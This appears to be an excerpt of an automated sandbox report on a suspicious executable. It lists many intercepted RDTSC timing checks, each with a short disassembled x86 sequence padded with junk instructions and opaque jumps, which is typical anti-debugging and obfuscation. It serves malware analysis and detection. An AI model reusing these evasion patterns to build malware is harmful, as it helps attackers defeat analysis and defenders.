Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17184DD second address: 17184EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F6Ah 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17184EF second address: 171850F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEA75194B57h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171850F second address: 1718519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1718E26 second address: 1718E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1718E90 second address: 1718EB4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEA75199F73h 0x0000000b popad 0x0000000c push eax 0x0000000d jnl 00007FEA75199F6Eh 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1719180 second address: 1719184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1719184 second address: 1719199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1719199 second address: 17191A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75194B4Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1719690 second address: 1719694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171A073 second address: 171A07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FEA75194B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171A07D second address: 171A081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171A081 second address: 171A090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171BD5A second address: 171BD60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171BD60 second address: 171BD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171BD64 second address: 171BD68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171C89D second address: 171C8AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEA75194B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FEA75194B46h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171C64B second address: 171C651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171C651 second address: 171C657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171C8AF second address: 171C94B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FEA75199F68h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov dword ptr [ebp+1244DF1Fh], ecx 0x0000002b push 00000000h 0x0000002d or di, 93F2h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007FEA75199F68h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov esi, dword ptr [ebp+122D24F1h] 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 jmp 00007FEA75199F6Dh 0x0000005b ja 00007FEA75199F68h 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FEA75199F6Fh 0x0000006a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171C657 second address: 171C65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171D125 second address: 171D12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171D3D9 second address: 171D3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171D3DD second address: 171D3F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEA75199F6Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171D3F5 second address: 171D3FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEA75194B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171D3FF second address: 171D409 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA75199F6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171DD43 second address: 171DD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171DD47 second address: 171DD51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171F99D second address: 171F9AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FEA75194B46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171FFED second address: 1720055 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA75199F68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FEA75199F6Bh 0x00000010 nop 0x00000011 jbe 00007FEA75199F6Ch 0x00000017 mov dword ptr [ebp+122D3611h], edi 0x0000001d push 00000000h 0x0000001f cmc 0x00000020 push 00000000h 0x00000022 and esi, dword ptr [ebp+122D353Fh] 0x00000028 add dword ptr [ebp+122D1851h], ecx 0x0000002e xchg eax, ebx 0x0000002f jmp 00007FEA75199F77h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jg 00007FEA75199F77h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1720814 second address: 1720818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1725435 second address: 172544B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F72h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172544B second address: 1725496 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c movzx eax, cx 0x0000000f jnp 00007FEA75194B4Ch 0x00000015 popad 0x00000016 push 00000000h 0x00000018 mov ebx, 7A0A39C3h 0x0000001d push 00000000h 0x0000001f or di, CAECh 0x00000024 push eax 0x00000025 pushad 0x00000026 pushad 0x00000027 jmp 00007FEA75194B53h 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 jnp 00007FEA75194B46h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17263A3 second address: 17263BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F74h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172659F second address: 17265A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1729496 second address: 172949C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172949C second address: 17294A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FEA75194B46h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17294A9 second address: 172951F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FEA75199F74h 0x00000011 popad 0x00000012 pop esi 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FEA75199F68h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D186Fh], edi 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+122D2A90h], ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007FEA75199F79h 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172951F second address: 1729525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1729525 second address: 1729529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172A5B0 second address: 172A5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172A5B6 second address: 172A5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172A5BA second address: 172A5DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FEA75194B56h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172B59F second address: 172B5AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172B5AD second address: 172B5B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172B5B2 second address: 172B64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F6Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FEA75199F68h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 call 00007FEA75199F78h 0x0000002e mov bl, EAh 0x00000030 pop ebx 0x00000031 push 00000000h 0x00000033 jmp 00007FEA75199F72h 0x00000038 push 00000000h 0x0000003a jmp 00007FEA75199F77h 0x0000003f xchg eax, esi 0x00000040 jmp 00007FEA75199F6Dh 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jl 00007FEA75199F66h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172B64D second address: 172B657 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEA75194B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172A79F second address: 172A7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172A7A3 second address: 172A7A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172C5D3 second address: 172C5DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172C5DC second address: 172C5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172D694 second address: 172D699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172D699 second address: 172D6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B54h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172D6BA second address: 172D6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172D6C1 second address: 172D715 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FEA75194B48h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D29EAh] 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D1825h], ebx 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D1A88h] 0x0000003a xchg eax, esi 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172D715 second address: 172D719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172E737 second address: 172E747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172F7DA second address: 172F7EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75199F6Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17307C4 second address: 17307C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17307C8 second address: 17307CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172C862 second address: 172C875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FEA75194B46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FEA75194B46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172C875 second address: 172C88D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b ja 00007FEA75199F66h 0x00000011 jp 00007FEA75199F66h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172C88D second address: 172C8A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B4Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172F901 second address: 172F90B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173299B second address: 1732A1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FEA75194B48h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D29D1h] 0x0000002b push 00000000h 0x0000002d pushad 0x0000002e mov dx, ax 0x00000031 xor edi, dword ptr [ebp+122D37C9h] 0x00000037 popad 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007FEA75194B48h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 js 00007FEA75194B4Ch 0x0000005a mov dword ptr [ebp+122D2B9Bh], eax 0x00000060 sub bx, AF84h 0x00000065 xchg eax, esi 0x00000066 push edi 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a pop eax 0x0000006b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1732A1F second address: 1732A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1732B83 second address: 1732C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 cld 0x00000009 push dword ptr fs:[00000000h] 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FEA75194B48h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a sub di, 6906h 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov bx, 7FE9h 0x0000003a mov eax, dword ptr [ebp+122D0365h] 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007FEA75194B48h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a sub edi, dword ptr [ebp+12447520h] 0x00000060 mov ebx, dword ptr [ebp+122D37D9h] 0x00000066 mov bx, cx 0x00000069 push FFFFFFFFh 0x0000006b jbe 00007FEA75194B4Ch 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 push edi 0x00000075 pushad 0x00000076 popad 0x00000077 pop edi 0x00000078 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17352F8 second address: 1735308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1736565 second address: 173656A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173656A second address: 1736570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D7ED second address: 173D830 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FEA75194B4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEA75194B53h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FEA75194B58h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D830 second address: 173D849 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA75199F66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FEA75199F6Eh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D849 second address: 173D857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jg 00007FEA75194B46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D857 second address: 173D869 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D869 second address: 173D86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173CECF second address: 173CEE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FEA75199F66h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D076 second address: 173D0A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B56h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEA75194B53h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D0A3 second address: 173D0A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D0A7 second address: 173D0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D235 second address: 173D23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17422C9 second address: 17422CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
